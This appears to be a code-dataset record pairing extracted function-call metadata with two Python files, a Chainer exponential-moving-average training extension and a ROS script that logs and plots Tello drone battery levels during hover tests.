'import torch\n'), ((9449, 9462), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9459, 9462), False, 'import torch\n'), ((9527, 9549), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9538, 9549), False, 'import torch\n'), ((9662, 9695), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9673, 9695), False, 'import torch\n'), ((9705, 9743), 'torch.zeros', 'torch.zeros', (['(3, 2)'], {'dtype': 'torch.int64'}), '((3, 2), dtype=torch.int64)\n', (9716, 9743), False, 'import torch\n'), ((9753, 9766), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (9763, 9766), False, 'import torch\n'), ((9831, 9853), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (9842, 9853), False, 'import torch\n'), ((9973, 10006), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9984, 10006), False, 'import torch\n'), ((10016, 10049), 'torch.zeros', 'torch.zeros', (['(4)'], {'dtype': 'torch.int64'}), '(4, dtype=torch.int64)\n', (10027, 10049), False, 'import torch\n'), ((10059, 10072), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (10069, 10072), False, 'import torch\n'), ((10137, 10159), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10148, 10159), False, 'import torch\n'), ((10291, 10324), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10302, 10324), False, 'import torch\n'), ((10334, 10367), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10345, 10367), False, 'import torch\n'), ((10445, 10467), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10456, 10467), False, 'import torch\n'), ((10580, 10613), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10591, 10613), False, 'import torch\n'), ((10623, 10656), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10634, 10656), False, 'import torch\n'), ((10666, 10684), 'torch.ones', 'torch.ones', (['(5, 3)'], {}), '((5, 3))\n', (10676, 10684), False, 'import torch\n'), ((10749, 10771), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (10760, 10771), False, 'import torch\n'), ((10891, 10924), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10902, 10924), False, 'import torch\n'), ((10934, 10967), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (10945, 10967), False, 'import torch\n'), ((10977, 10990), 'torch.ones', 'torch.ones', (['(4)'], {}), '(4)\n', (10987, 10990), False, 'import torch\n'), ((11055, 11077), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11066, 11077), False, 'import torch\n'), ((11218, 11251), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11229, 11251), False, 'import torch\n'), ((11261, 11294), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11272, 11294), False, 'import torch\n'), ((11399, 11421), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (11410, 11421), False, 'import torch\n'), ((11536, 11569), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11547, 11569), False, 'import torch\n'), ((11579, 11612), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11590, 11612), False, 'import torch\n'), ((11622, 11635), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11632, 11635), False, 'import torch\n'), ((11700, 11722), 'torch.zeros', 'torch.zeros', (['(5, 4, 2)'], {}), '((5, 4, 2))\n', (11711, 11722), False, 'import torch\n'), ((11888, 11921), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11899, 11921), False, 'import torch\n'), ((11931, 11964), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (11942, 11964), False, 'import torch\n'), ((11974, 11987), 'torch.ones', 'torch.ones', (['(5)'], {}), '(5)\n', (11984, 11987), False, 'import torch\n'), ((13450, 13500), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (13463, 13500), False, 'import pytest\n'), ((13514, 13541), 'obp.ope.SwitchDoublyRobust', 'SwitchDoublyRobust', ([], {'tau': 'tau'}), '(tau=tau)\n', (13532, 13541), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14243, 14293), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (14256, 14293), False, 'import pytest\n'), ((14307, 14349), 'obp.ope.DoublyRobustWithShrinkage', 'DoublyRobustWithShrinkage', ([], {'lambda_': 'lambda_'}), '(lambda_=lambda_)\n', (14332, 14349), False, 'from obp.ope import DirectMethod, DoublyRobust, DoublyRobustWithShrinkage, SwitchDoublyRobust, SelfNormalizedDoublyRobust\n'), ((14724, 14753), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (14744, 14753), False, 'from conftest import generate_action_dist\n'), ((14763, 14790), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (14779, 14790), True, 'import numpy as np\n'), ((14800, 14822), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (14808, 14822), True, 'import numpy as np\n'), ((14832, 14876), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (14849, 14876), True, 'import numpy as np\n'), ((14886, 14913), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (14902, 14913), True, 'import numpy as np\n'), ((14923, 14942), 'numpy.zeros', 'np.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (14931, 14942), True, 'import numpy as np\n'), ((16181, 16214), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (16192, 16214), False, 'import torch\n'), ((16351, 16373), 'torch.zeros', 'torch.zeros', (['(5, 4, 3)'], {}), '((5, 4, 3))\n', (16362, 16373), False, 'import torch\n'), ((23912, 23950), 'numpy.abs', 'np.abs', (['(dr_value - dr_shrink_max_value)'], {}), '(dr_value - dr_shrink_max_value)\n', (23918, 23950), True, 'import numpy as np\n'), ((2003, 2025), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2011, 2025), True, 'import numpy as np\n'), ((2730, 2752), 'numpy.zeros', 'np.zeros', (['(5)'], {'dtype': 'int'}), '(5, dtype=int)\n', (2738, 2752), True, 'import numpy as np\n'), ((5712, 5762), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (5725, 5762), False, 'import pytest\n'), ((6088, 6138), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (6101, 6138), False, 'import pytest\n'), ((6632, 6661), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6652, 6661), False, 'from conftest import generate_action_dist\n'), ((6769, 6796), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (6785, 6796), True, 'import numpy as np\n'), ((6902, 6931), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (6922, 6931), False, 'from conftest import generate_action_dist\n'), ((7039, 7066), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7055, 7066), True, 'import numpy as np\n'), ((7172, 7201), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7192, 7201), False, 'from conftest import generate_action_dist\n'), ((7329, 7356), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7345, 7356), True, 'import numpy as np\n'), ((7462, 7491), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7482, 7491), False, 'from conftest import generate_action_dist\n'), ((7628, 7655), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7644, 7655), True, 'import numpy as np\n'), ((7767, 7796), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (7787, 7796), False, 'from conftest import generate_action_dist\n'), ((7935, 7962), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (7951, 7962), True, 'import numpy as np\n'), ((8092, 8121), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8112, 8121), False, 'from conftest import generate_action_dist\n'), ((8132, 8165), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (8143, 8165), False, 'import torch\n'), ((8262, 8289), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8278, 8289), True, 'import numpy as np\n'), ((8419, 8448), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8439, 8448), False, 'from conftest import generate_action_dist\n'), ((8555, 8582), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8571, 8582), True, 'import numpy as np\n'), ((8688, 8717), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (8708, 8717), False, 'from conftest import generate_action_dist\n'), ((8859, 8886), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (8875, 8886), True, 'import numpy as np\n'), ((8999, 9028), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9019, 9028), False, 'from conftest import generate_action_dist\n'), ((9039, 9072), 'torch.zeros', 'torch.zeros', (['(5)'], {'dtype': 'torch.int64'}), '(5, dtype=torch.int64)\n', (9050, 9072), False, 'import torch\n'), ((9169, 9196), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9185, 9196), True, 'import numpy as np\n'), ((9353, 9382), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9373, 9382), False, 'from conftest import generate_action_dist\n'), ((9489, 9516), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9505, 9516), True, 'import numpy as np\n'), ((9622, 9651), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9642, 9651), False, 'from conftest import generate_action_dist\n'), ((9793, 9820), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (9809, 9820), True, 'import numpy as np\n'), ((9933, 9962), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (9953, 9962), False, 'from conftest import generate_action_dist\n'), ((10099, 10126), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10115, 10126), True, 'import numpy as np\n'), ((10251, 10280), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10271, 10280), False, 'from conftest import generate_action_dist\n'), ((10407, 10434), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10423, 10434), True, 'import numpy as np\n'), ((10540, 10569), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10560, 10569), False, 'from conftest import generate_action_dist\n'), ((10711, 10738), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (10727, 10738), True, 'import numpy as np\n'), ((10851, 10880), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (10871, 10880), False, 'from conftest import generate_action_dist\n'), ((11017, 11044), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11033, 11044), True, 'import numpy as np\n'), ((11178, 11207), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11198, 11207), False, 'from conftest import generate_action_dist\n'), ((11321, 11333), 'numpy.arange', 'np.arange', (['(5)'], {}), '(5)\n', (11330, 11333), True, 'import numpy as np\n'), ((11361, 11388), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11377, 11388), True, 'import numpy as np\n'), ((11496, 11525), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11516, 11525), False, 'from conftest import generate_action_dist\n'), ((11662, 11689), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (11678, 11689), True, 'import numpy as np\n'), ((11848, 11877), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (11868, 11877), False, 'from conftest import generate_action_dist\n'), ((12014, 12041), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (12030, 12041), True, 'import numpy as np\n'), ((12664, 12714), 'pytest.raises', 'pytest.raises', (['ValueError'], {'match': 'f"""{description}*"""'}), "(ValueError, match=f'{description}*')\n", (12677, 12714), False, 'import pytest\n'), ((16086, 16115), 'conftest.generate_action_dist', 'generate_action_dist', (['(5)', '(4)', '(3)'], {}), '(5, 4, 3)\n', (16106, 16115), False, 'from conftest import generate_action_dist\n'), ((16143, 16170), 'numpy.random.choice', 'np.random.choice', (['(4)'], {'size': '(5)'}), '(4, size=5)\n', (16159, 16170), True, 'import numpy as np\n'), ((16241, 16285), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(0.5)', 'high': '(1.0)', 'size': '(5)'}), '(low=0.5, high=1.0, size=5)\n', (16258, 16285), True, 'import numpy as np\n'), ((16313, 16340), 'numpy.random.choice', 'np.random.choice', (['(3)'], {'size': '(5)'}), '(3, size=5)\n', (16329, 16340), True, 'import numpy as np\n'), ((18944, 18963), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (18960, 18963), False, 'import torch\n'), ((22095, 22114), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (22111, 22114), False, 'import torch\n'), ((24131, 24150), 'torch.from_numpy', 'torch.from_numpy', (['v'], {}), '(v)\n', (24147, 24150), False, 'import torch\n'), ((18612, 18766), 're.escape', 're.escape', (['"""estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (18621, 18766), False, 'import re\n'), ((19478, 19565), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (19487, 19565), False, 'import re\n'), ((20348, 20435), 're.escape', 're.escape', (['"""This is not implemented for Swtich-DR because it is indifferentiable."""'], {}), "(\n 'This is not implemented for Swtich-DR because it is indifferentiable.')\n", (20357, 20435), False, 'import re\n'), ((20660, 20821), 're.escape', 're.escape', (['"""estimate_policy_value_tensor() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"""'], {}), '(\n "estimate_policy_value_tensor() missing 4 required positional arguments: \'reward\', \'action\', \'pscore\', and \'estimated_rewards_by_reg_model\'"\n )\n', (20669, 20821), False, 'import re\n')]
|
import numpy as np
from chainer import cuda, Link, Chain, ChainList
from chainer.training import extension
def _namedpersistents_as_link(target):
assert isinstance(target, Link)
d = target.__dict__
for name in target._persistent:
yield '/' + name, d[name]
def _namedpersistents_as_chain(target):
assert isinstance(target, Chain)
for name, persistent in _namedpersistents_as_link(target):
yield name, persistent
d = target.__dict__
for name in target._children:
prefix = '/' + name
for path, persistent in namedpersistents(d[name]):
yield prefix + path, persistent
def _namedpersistents_as_chain_list(target):
assert isinstance(target, ChainList)
for name, persistent in _namedpersistents_as_link(target):
yield name, persistent
for idx, link in enumerate(target._children):
prefix = '/%d' % idx
for path, persistent in namedpersistents(link):
yield prefix + path, persistent
def namedpersistents(target):
if isinstance(target, Chain):
retriever = _namedpersistents_as_chain
elif isinstance(target, ChainList):
retriever = _namedpersistents_as_chain_list
elif isinstance(target, Link): # do not put this above, because Chain/ChainList are Link
retriever = _namedpersistents_as_link
else:
raise ValueError
for name, persistent in retriever(target):
yield name, persistent
class ExponentialMovingAverage(extension.Extension):
name = 'ExponentialMovingAverage'
timing = 'post'
def __init__(self, target, rate, device=None):
self.shadow_target = target.copy()
self._shadow_data = dict()
self._rate = rate
self._device = device
self._initialized = False
self._param_names = set()
for name, _ in target.namedparams():
self._param_names.add(name)
def __call__(self, optimizer):
if not self._initialized:
self._initialize()
target_persistents = {}
for name, param in namedpersistents(optimizer.target):
target_persistents[name] = param
# copy all persistents to shadow_target
# without this, all of persistents in shadow_target will be initialized in multiprocessing environments
for name, persistent in namedpersistents(self.shadow_target):
# persistent's type is numpy/cupy array or scalar (int/float)
if isinstance(persistent, cuda.ndarray):
persistent.data.copy_from(target_persistents[name].data, persistent.size * persistent.dtype.itemsize)
else:
persistent = target_persistents[name]
for name, param in optimizer.target.namedparams():
self._update_shadow(name, param)
for name, param in self.shadow_target.namedparams():
param.data = self._shadow_data[name]
@property
def trigger(self):
return None
def _initialize(self):
# necessary for cases when using multiprocess parallel updater
self.shadow_target.to_gpu(self._device)
self._initialized = True
def _update_shadow(self, name, param):
s, p = self._shadow_data.get(name), param.data
if p is None:
return
if s is None:
self._shadow_data[name] = cuda.get_array_module(p).array(p)
return
with cuda.get_device_from_array(p) as dev:
if int(dev) == -1:
s -= (1 - self._rate) * (s - p)
else:
kernel = cuda.elementwise('T p, T decay',
'T s',
's -= (1 - decay) * (s - p)',
'exponential_moving_average')
kernel(p, self._rate, s)
def serialize(self, serializer):
for name in self._param_names:
shadow_data = self._shadow_data.get(name)
data = serializer['shadow_params'](name, shadow_data)
if shadow_data is None and data is not None:
if self._device == -1:
self._shadow_data[name] = np.array(data)
else:
self._shadow_data[name] = cuda.to_gpu(data, device=self._device)
|
[
"chainer.cuda.get_device_from_array",
"chainer.cuda.get_array_module",
"chainer.cuda.elementwise",
"numpy.array",
"chainer.cuda.to_gpu"
] |
[((3435, 3464), 'chainer.cuda.get_device_from_array', 'cuda.get_device_from_array', (['p'], {}), '(p)\n', (3461, 3464), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3596, 3699), 'chainer.cuda.elementwise', 'cuda.elementwise', (['"""T p, T decay"""', '"""T s"""', '"""s -= (1 - decay) * (s - p)"""', '"""exponential_moving_average"""'], {}), "('T p, T decay', 'T s', 's -= (1 - decay) * (s - p)',\n 'exponential_moving_average')\n", (3612, 3699), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((3368, 3392), 'chainer.cuda.get_array_module', 'cuda.get_array_module', (['p'], {}), '(p)\n', (3389, 3392), False, 'from chainer import cuda, Link, Chain, ChainList\n'), ((4203, 4217), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4211, 4217), True, 'import numpy as np\n'), ((4286, 4324), 'chainer.cuda.to_gpu', 'cuda.to_gpu', (['data'], {'device': 'self._device'}), '(data, device=self._device)\n', (4297, 4324), False, 'from chainer import cuda, Link, Chain, ChainList\n')]
|
#!/usr/bin/env python
import rospy
import os
import matplotlib.pyplot as plt
import pickle
from tello_driver.msg import TelloStatus
import numpy as np
import atexit
import datetime
RECORD_BATTERY = False
class BatteryLogPlot(object):
def __init__(self):
# current variables
self.zero_time = rospy.Time.now()
print(self.zero_time)
self.time_axis = []
self.battery_level = []
# Subscribe to Sensor and Odom topic
self.sub_tello_status = rospy.Subscriber('/tello/status', TelloStatus, self.cb_status)
rospy.loginfo('Battery Plot ready')
# at exit save plot
atexit.register(self.save_plot)
def cb_status(self, msg):
now = rospy.Time.now()
self.time_axis.append(now.secs-self.zero_time.secs)
self.battery_level.append(msg.battery_percentage)
print('time passed: ', now.secs-self.zero_time.secs, ' battery: ', msg.battery_percentage)
def save_plot(self):
print('dumping variables')
path = '%s/Documents/%s' % (os.getenv('HOME'),
datetime.datetime.now().strftime('battery-hover-tello-sensor-no-ds%Y-%m-%d_%H%M%S'))
# save save variables as pickle
pickle.dump([self.time_axis, self.battery_level], file(path + '.pickle', 'w'))
print('Variables saved')
def plot_battery():
# load pickles
# path_tello_sensor_esp_off = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle'
# path_tello_sensor_esp_on_ds_on = '/home/tello18/Documents/battery-hover-2020-08-17_235612.pickle'
# path_tello_sensor_esp_on_ds_off = '/home/tello18/Documents/battery-hover-no-ds2020-09-06_222136'
tello_only_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-08-18.pickle'
tello_only_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-only2020-09-08_144210.pickle'
tello_sensor_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-2020-08-18_165044.pickle'
tello_sensor_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-off2020-09-07_180356.pickle'
tello_sensor_no_probs = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-off-no-props2020-09-08_175258.pickle'
tello_sensor_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-1-2020-08-20_185543.pickle'
tello_sensor_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-sensor-ds-2-2020-08-21_155335.pickle'
tello_sensor_no_ds_1 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-no-ds2020-09-06_222136.pickle'
tello_sensor_no_ds_2 = '/home/tello18/Documents/Tello_flight_time_test/battery-hover-tello-sensor-no-ds2020-09-10_183630.pickle'
time_tello, battery_level_tello = pickle.load(file(tello_only_1))
time_tello_2, battery_level_tello_2 = pickle.load(file(tello_only_2))
time_tello_sensor_no_probs, battery_level_tello_sensor_no_probs = pickle.load(file(tello_sensor_no_probs))
time_tello_sensor, battery_level_tello_sensor = pickle.load(file(tello_sensor_1))
time_tello_sensor_2, battery_level_tello_sensor_2 = pickle.load(file(tello_sensor_2))
time_tello_sensor_ds, battery_level_tello_ds_sensor = pickle.load(file(tello_sensor_ds_1))
time_tello_sensor_ds_2, battery_level_tello_ds_sensor_2 = pickle.load(file(tello_sensor_ds_2))
time_tello_sensor_no_ds, battery_level_tello_sensor_no_ds = pickle.load(file(tello_sensor_no_ds_1))
time_tello_sensor_no_ds_2, battery_level_tello_sensor_no_ds_2 = pickle.load(file(tello_sensor_no_ds_2))
# time in min
time_tello_min = [x / 60.0 for x in time_tello]
time_tello_min_2 = [x / 60.0 for x in time_tello_2]
time_tello_sensor_no_probs_min = [x / 60.0 for x in time_tello_sensor_no_probs]
time_tello_sensor_min = [x / 60.0 for x in time_tello_sensor]
time_tello_sensor_min_2 = [x / 60.0 for x in time_tello_sensor_2]
time_tello_sensor_ds_min = [x / 60.0 for x in time_tello_sensor_ds]
time_tello_sensor_ds_min_2 = [x / 60.0 for x in time_tello_sensor_ds_2]
time_tello_sensor_no_ds_min = [x / 60.0 for x in time_tello_sensor_no_ds]
time_tello_sensor_no_ds_min_2 = [x / 60.0 for x in time_tello_sensor_no_ds_2]
# plot
fig_battery = plt.figure()
ax_battery = fig_battery.add_subplot(111)
# ax_battery.scatter(time_tello_min, battery_level_tello, marker='.', c='b', linewidths=0.01, alpha=0.1)
# , 'o', color='b', label='Tello only')
# Fit with polyfit
# p = np.poly1d(np.polyfit(time_tello_min, battery_level_tello, 3))
# ax_battery.plot(time_tello_min, p(time_tello_min), color='b', linewidth=2.0, label='Tello only')
ax_battery.plot(time_tello_min, battery_level_tello, color='g', linewidth=1.0,
label='Tello only: %.1f min' % time_tello_min[-1])
ax_battery.plot(time_tello_min_2, battery_level_tello_2, color='g', linewidth=1.0,
label='Tello only: %.1f min' % time_tello_min_2[-1])
ax_battery.plot(time_tello_sensor_no_probs_min, battery_level_tello_sensor_no_probs, color='c', linewidth=1.0,
label='Tello no guards with sensor off: %.1f min' % time_tello_sensor_no_probs_min[-1])
ax_battery.plot(time_tello_sensor_min, battery_level_tello_sensor, color='b', linewidth=1.0,
label='Tello with sensor off: %.1f min' % time_tello_sensor_min[-1])
ax_battery.plot(time_tello_sensor_min_2, battery_level_tello_sensor_2, color='b', linewidth=1.0,
label='Tello with sensor off: %.1f min' % time_tello_sensor_min_2[-1])
ax_battery.plot(time_tello_sensor_ds_min, battery_level_tello_ds_sensor, color='y', linewidth=1.0,
label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min[-1])
ax_battery.plot(time_tello_sensor_ds_min_2, battery_level_tello_ds_sensor_2, color='y', linewidth=1.0,
label='Tello with sensor and ds: %.1f min' % time_tello_sensor_ds_min_2[-1])
ax_battery.plot(time_tello_sensor_no_ds_min, battery_level_tello_sensor_no_ds, color='k', linewidth=1.0,
label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min[-1])
ax_battery.plot(time_tello_sensor_no_ds_min_2, battery_level_tello_sensor_no_ds_2, color='k', linewidth=1.0,
label='Tello with sensor and no ds: %.1f min' % time_tello_sensor_no_ds_min_2[-1])
ax_battery.set_xlabel('time in [min]')
ax_battery.set_ylabel('battery level in [%]')
ax_battery.set_title('Flight Time')
ax_battery.legend()
plt.xticks(np.arange(0, 12.1, step=1.0))
plt.yticks(np.arange(0, 100.1, step=10.0))
plt.grid(linewidth=.5)
plt.show()
def main():
rospy.init_node('battery_plot_node')
if RECORD_BATTERY:
sensor = BatteryLogPlot()
rospy.spin() # keep process alive
else:
plot_battery()
if __name__ == '__main__':
main()
|
[
"atexit.register",
"matplotlib.pyplot.show",
"rospy.Time.now",
"rospy.Subscriber",
"datetime.datetime.now",
"rospy.loginfo",
"matplotlib.pyplot.figure",
"numpy.arange",
"rospy.init_node",
"rospy.spin",
"matplotlib.pyplot.grid",
"os.getenv"
] |
[((4337, 4349), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4347, 4349), True, 'import matplotlib.pyplot as plt\n'), ((6745, 6768), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'linewidth': '(0.5)'}), '(linewidth=0.5)\n', (6753, 6768), True, 'import matplotlib.pyplot as plt\n'), ((6772, 6782), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6780, 6782), True, 'import matplotlib.pyplot as plt\n'), ((6801, 6837), 'rospy.init_node', 'rospy.init_node', (['"""battery_plot_node"""'], {}), "('battery_plot_node')\n", (6816, 6837), False, 'import rospy\n'), ((315, 331), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (329, 331), False, 'import rospy\n'), ((500, 562), 'rospy.Subscriber', 'rospy.Subscriber', (['"""/tello/status"""', 'TelloStatus', 'self.cb_status'], {}), "('/tello/status', TelloStatus, self.cb_status)\n", (516, 562), False, 'import rospy\n'), ((571, 606), 'rospy.loginfo', 'rospy.loginfo', (['"""Battery Plot ready"""'], {}), "('Battery Plot ready')\n", (584, 606), False, 'import rospy\n'), ((644, 675), 'atexit.register', 'atexit.register', (['self.save_plot'], {}), '(self.save_plot)\n', (659, 675), False, 'import atexit\n'), ((721, 737), 'rospy.Time.now', 'rospy.Time.now', ([], {}), '()\n', (735, 737), False, 'import rospy\n'), ((6664, 6692), 'numpy.arange', 'np.arange', (['(0)', '(12.1)'], {'step': '(1.0)'}), '(0, 12.1, step=1.0)\n', (6673, 6692), True, 'import numpy as np\n'), ((6709, 6739), 'numpy.arange', 'np.arange', (['(0)', '(100.1)'], {'step': '(10.0)'}), '(0, 100.1, step=10.0)\n', (6718, 6739), True, 'import numpy as np\n'), ((6908, 6920), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (6918, 6920), False, 'import rospy\n'), ((1054, 1071), 'os.getenv', 'os.getenv', (['"""HOME"""'], {}), "('HOME')\n", (1063, 1071), False, 'import os\n'), ((1108, 1131), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), 